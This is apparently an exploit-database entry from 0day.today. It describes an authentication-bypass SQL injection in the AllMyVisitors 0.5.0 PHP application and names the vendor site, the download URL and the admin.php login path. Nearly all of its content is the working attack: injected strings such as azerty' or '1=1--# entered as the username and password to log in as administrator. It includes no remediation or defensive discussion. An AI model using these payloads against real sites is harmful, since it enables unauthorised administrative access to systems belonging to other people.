id: 22290
date: 05/29/2014
title: AllMyVisitors 0.5.0 (Auth Bypass) SQL Injection Vulnerability
author: JiKo
cves: 

----------[exploit Debut]
[(Auth Bypass) SQL Injection Vulnerability]
----------[Script Info]
 
Author	    : JIKO
 
----------[Script Info]
 
Site	    : http://www.voice-of-web.de/c-AllMyVisitors-s29.html
Version     : 0.5.0
Download    : http://www.voice-of-web.de/media/downloads/AllMyPHP/AllMyVisitors/AllMyVisitors0.5.0.zip
 
----------[exploit Info]
 
Exploit :
http://Path/admin.php

 Username : azerty' or '1=1--# Real admin name
 Password : demo1 ' or ' 1=1 or JIKO or  any thing
----------[exploit Fin]

#  0day.today [2023-03-22]  #